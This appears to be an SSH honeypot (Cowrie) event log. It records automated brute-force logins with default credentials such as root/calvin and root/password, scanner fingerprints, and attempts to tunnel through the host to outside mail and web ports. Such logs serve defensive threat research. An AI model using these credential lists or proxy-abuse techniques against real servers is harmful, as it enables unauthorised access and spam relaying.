{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.934561Z","src_ip":"212.227.125.160","session":"46c1662b32a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T22:27:42.049074Z","session":"46c1662b32a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29864,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c58cf91167f","protocol":"ssh","message":"New connection: 212.227.125.160:29864 (1.2.3.4:22) [session: 7c58cf91167f]","sensor":"my-vps","timestamp":"2025-08-28T22:27:43.969284Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:27:44.158976Z","src_ip":"212.227.125.160","session":"7c58cf91167f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:44.160214Z","src_ip":"212.227.125.160","session":"7c58cf91167f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29868,"dst_ip":"1.2.3.4","dst_port":22,"session":"439a8324c42a","protocol":"ssh","message":"New connection: 212.227.125.160:29868 (1.2.3.4:22) [session: 439a8324c42a]","sensor":"my-vps","timestamp":"2025-08-28T22:27:45.244877Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:45.524204Z","src_ip":"212.227.125.160","session":"439a8324c42a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29892,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cd2b2492b49","protocol":"ssh","message":"New connection: 212.227.125.160:29892 (1.2.3.4:22) [session: 5cd2b2492b49]","sensor":"my-vps","timestamp":"2025-08-28T22:27:46.679296Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:46.886431Z","src_ip":"212.227.125.160","session":"5cd2b2492b49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29904,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecc19aca36a9","protocol":"ssh","message":"New connection: 212.227.125.160:29904 (1.2.3.4:22) [session: ecc19aca36a9]","sensor":"my-vps","timestamp":"2025-08-28T22:27:47.956802Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:48.175318Z","src_ip":"212.227.125.160","session":"ecc19aca36a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29914,"dst_ip":"1.2.3.4","dst_port":22,"session":"35d297246035","protocol":"ssh","message":"New connection: 212.227.125.160:29914 (1.2.3.4:22) [session: 35d297246035]","sensor":"my-vps","timestamp":"2025-08-28T22:27:48.790355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:27:48.791258Z","src_ip":"212.227.125.160","session":"35d297246035"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:27:48.834261Z","src_ip":"212.227.125.160","session":"35d297246035"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58608,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2ac711a7ff0","protocol":"ssh","message":"New connection: 212.227.125.160:58608 (1.2.3.4:22) [session: e2ac711a7ff0]","sensor":"my-vps","timestamp":"2025-08-28T22:27:48.985122Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T22:27:48.989629Z","src_ip":"212.227.125.160","session":"35d297246035"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:50.112587Z","src_ip":"212.227.125.160","session":"35d297246035"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T22:27:50.271253Z","src_ip":"212.227.125.160","session":"e2ac711a7ff0"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T22:27:51.240590Z","src_ip":"212.227.125.160","session":"e2ac711a7ff0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26528,"dst_ip":"1.2.3.4","dst_port":22,"session":"37b6f92bb6f5","protocol":"ssh","message":"New connection: 212.227.125.160:26528 (1.2.3.4:22) [session: 37b6f92bb6f5]","sensor":"my-vps","timestamp":"2025-08-28T22:27:53.081379Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:27:53.082247Z","src_ip":"212.227.125.160","session":"37b6f92bb6f5"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:53.083286Z","src_ip":"212.227.125.160","session":"37b6f92bb6f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26538,"dst_ip":"1.2.3.4","dst_port":22,"session":"b41798356444","protocol":"ssh","message":"New connection: 212.227.125.160:26538 (1.2.3.4:22) [session: b41798356444]","sensor":"my-vps","timestamp":"2025-08-28T22:27:53.766107Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:27:53.958015Z","src_ip":"212.227.125.160","session":"b41798356444"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:53.959300Z","src_ip":"212.227.125.160","session":"b41798356444"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26540,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf0617e09136","protocol":"ssh","message":"New connection: 212.227.125.160:26540 (1.2.3.4:22) [session: bf0617e09136]","sensor":"my-vps","timestamp":"2025-08-28T22:27:54.527422Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:27:54.676202Z","src_ip":"212.227.125.160","session":"bf0617e09136"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:54.677411Z","src_ip":"212.227.125.160","session":"bf0617e09136"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26548,"dst_ip":"1.2.3.4","dst_port":22,"session":"62d501aedc76","protocol":"ssh","message":"New connection: 212.227.125.160:26548 (1.2.3.4:22) [session: 62d501aedc76]","sensor":"my-vps","timestamp":"2025-08-28T22:27:56.601006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:27:56.601885Z","src_ip":"212.227.125.160","session":"62d501aedc76"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:27:56.644195Z","src_ip":"212.227.125.160","session":"62d501aedc76"}
{"eventid":"cowrie.login.failed","username":"uucp","password":"admin","message":"login attempt [uucp/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T22:27:56.843777Z","src_ip":"212.227.125.160","session":"62d501aedc76"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:57.773345Z","src_ip":"212.227.125.160","session":"e2ac711a7ff0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:57.984119Z","src_ip":"212.227.125.160","session":"62d501aedc76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33264,"dst_ip":"1.2.3.4","dst_port":22,"session":"c88885fd27de","protocol":"ssh","message":"New connection: 212.227.125.160:33264 (1.2.3.4:22) [session: c88885fd27de]","sensor":"my-vps","timestamp":"2025-08-28T22:27:59.128520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:27:59.129912Z","src_ip":"212.227.125.160","session":"c88885fd27de"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:27:59.172703Z","src_ip":"212.227.125.160","session":"c88885fd27de"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T22:27:59.334873Z","src_ip":"212.227.125.160","session":"c88885fd27de"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:00.470933Z","src_ip":"212.227.125.160","session":"c88885fd27de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33296,"dst_ip":"1.2.3.4","dst_port":22,"session":"0eca5b90d0db","protocol":"ssh","message":"New connection: 212.227.125.160:33296 (1.2.3.4:22) [session: 0eca5b90d0db]","sensor":"my-vps","timestamp":"2025-08-28T22:28:01.656218Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:28:01.835037Z","src_ip":"212.227.125.160","session":"0eca5b90d0db"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:01.836337Z","src_ip":"212.227.125.160","session":"0eca5b90d0db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65327,"dst_ip":"1.2.3.4","dst_port":22,"session":"3931274f004f","protocol":"ssh","message":"New connection: 212.227.235.229:65327 (1.2.3.4:22) [session: 3931274f004f]","sensor":"my-vps","timestamp":"2025-08-28T22:28:02.367225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:28:02.380465Z","src_ip":"212.227.235.229","session":"3931274f004f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:28:02.505131Z","src_ip":"212.227.235.229","session":"3931274f004f"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:28:03.067798Z","src_ip":"212.227.235.229","session":"3931274f004f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T22:28:03.193860Z","session":"3931274f004f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48406,"dst_ip":"1.2.3.4","dst_port":22,"session":"db097e6283de","protocol":"ssh","message":"New connection: 212.227.125.160:48406 (1.2.3.4:22) [session: db097e6283de]","sensor":"my-vps","timestamp":"2025-08-28T22:28:03.501907Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T22:28:03.667573Z","src_ip":"212.227.235.229","session":"3931274f004f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:04.156100Z","src_ip":"212.227.235.229","session":"3931274f004f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:28:05.003645Z","src_ip":"212.227.125.160","session":"db097e6283de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:28:05.004624Z","src_ip":"212.227.125.160","session":"db097e6283de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33308,"dst_ip":"1.2.3.4","dst_port":22,"session":"94f1e6835f13","protocol":"ssh","message":"New connection: 212.227.125.160:33308 (1.2.3.4:22) [session: 94f1e6835f13]","sensor":"my-vps","timestamp":"2025-08-28T22:28:07.765895Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:08.343244Z","src_ip":"212.227.125.160","session":"94f1e6835f13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18244,"dst_ip":"1.2.3.4","dst_port":22,"session":"f280c75125d6","protocol":"ssh","message":"New connection: 212.227.125.160:18244 (1.2.3.4:22) [session: f280c75125d6]","sensor":"my-vps","timestamp":"2025-08-28T22:28:09.349647Z"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:09.894498Z","src_ip":"212.227.125.160","session":"f280c75125d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18250,"dst_ip":"1.2.3.4","dst_port":22,"session":"593fd78ccce1","protocol":"ssh","message":"New connection: 212.227.125.160:18250 (1.2.3.4:22) [session: 593fd78ccce1]","sensor":"my-vps","timestamp":"2025-08-28T22:28:10.792588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:28:10.793316Z","src_ip":"212.227.125.160","session":"593fd78ccce1"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:28:10.836357Z","src_ip":"212.227.125.160","session":"593fd78ccce1"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T22:28:11.005854Z","src_ip":"212.227.125.160","session":"593fd78ccce1"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:28:11.159689Z","src_ip":"212.227.125.160","session":"db097e6283de"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:12.114367Z","src_ip":"212.227.125.160","session":"593fd78ccce1"}
